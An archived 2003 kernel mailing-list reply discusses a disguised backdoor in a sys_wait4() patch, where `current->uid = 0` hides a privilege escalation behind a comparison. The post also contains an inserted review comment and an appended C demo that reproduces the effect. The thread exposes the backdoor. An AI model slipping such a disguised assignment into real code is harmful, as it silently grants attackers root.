Re: BK2CVS problem
From: Scott Robert Ladd (coyote_at_coyotegulch.com)
Date: 11/06/03
- Previous message: Fabio Coatti: "Re: test9 and bluetooth"
- In reply to: Larry McVoy: "Re: BK2CVS problem"
- Next in thread: bert hubert: "Re: BK2CVS problem"
- Reply: bert hubert: "Re: BK2CVS problem"
Date: Wed, 05 Nov 2003 23:09:24 -0500
To: Larry McVoy <lm@bitmover.com>
Larry McVoy wrote:
> On Wed, Nov 05, 2003 at 04:48:09PM -0600, Chad Kitching wrote:
>
>>From: Zwane Mwaikambo
>>
>>>>+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
>>>>+ retval = -EINVAL;
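Review bot: the second operand of the `&&`, `(current->uid = 0)`, uses `=` and so assigns 0 to `current->uid` whenever `options == (__WCLONE|__WALL)` holds; the assignment evaluates to 0, so the condition is always false and `retval = -EINVAL` is never executed by this branch. If a check was intended it should read `current->uid == 0`, and the change should state why a uid test belongs in the options validation at all.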
>>>
>>>That looks odd
>>>
>>
>>Setting current->uid to zero when options __WCLONE and __WALL are set? The
>>retval is dead code because of the next line, but it looks like an attempt
>>to backdoor the kernel, does it not?
>
>
> It sure does. Note "current->uid = 0", not "current->uid == 0".
> Good eyes, I missed that. This function is sys_wait4() so by passing in
> __WCLONE|__WALL you are root. How nice.
In other words, the theoretical exploit was inserted by someone clever.
Do we have any idea who?
BTW, good job catching the problem Larry.
--
Scott Robert Ladd
Coyote Gulch Productions (http://www.coyotegulch.com)
Software Invention for High-Performance Computing
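The effect of the condition quoted in this thread, as an added userland example that is not part of the original message or of the kernel source. `demo_task`, the `DEMO_*` constants and the function names are hypothetical stand-ins; the block contrasts the quoted `=` with the `==` form.

```c
#include <stdio.h>

/* Stand-ins for the kernel's flag bits, errno and task struct (constructed for this demo). */
#define DEMO_WCLONE 0x80000000u
#define DEMO_WALL   0x40000000u
#define DEMO_EINVAL 22

struct demo_task { unsigned int uid; };

/* The condition as quoted in the thread: "=" assigns, it does not compare. */
static int check_as_quoted(struct demo_task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (DEMO_WCLONE | DEMO_WALL)) && (current->uid = 0))
        retval = -DEMO_EINVAL;   /* never reached: the assignment evaluates to 0 */
    return retval;
}

/* The same line with "==": a pure comparison with no side effect. */
static int check_with_comparison(struct demo_task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (DEMO_WCLONE | DEMO_WALL)) && (current->uid == 0))
        retval = -DEMO_EINVAL;
    return retval;
}

/* Runs one check on a fresh task with the given uid; returns the uid afterwards. */
static unsigned int uid_after(int (*check)(struct demo_task *, unsigned int),
                              unsigned int uid, unsigned int options, int *retval)
{
    struct demo_task t = { uid };
    *retval = check(&t, options);
    return t.uid;
}

int main(void)
{
    int rv;
    unsigned int uid, both = DEMO_WCLONE | DEMO_WALL;
    uid = uid_after(check_as_quoted, 1000, both, &rv);
    printf("as quoted, both flags: uid 1000 -> %u, retval %d\n", uid, rv);
    uid = uid_after(check_as_quoted, 1000, DEMO_WALL, &rv);
    printf("as quoted, one flag:   uid 1000 -> %u, retval %d\n", uid, rv);
    uid = uid_after(check_with_comparison, 1000, both, &rv);
    printf("with '==', both flags: uid 1000 -> %u, retval %d\n", uid, rv);
    return 0;
}
```

The return value is 0 in all three calls, so nothing visible to the caller distinguishes the two forms; only the task's uid differs.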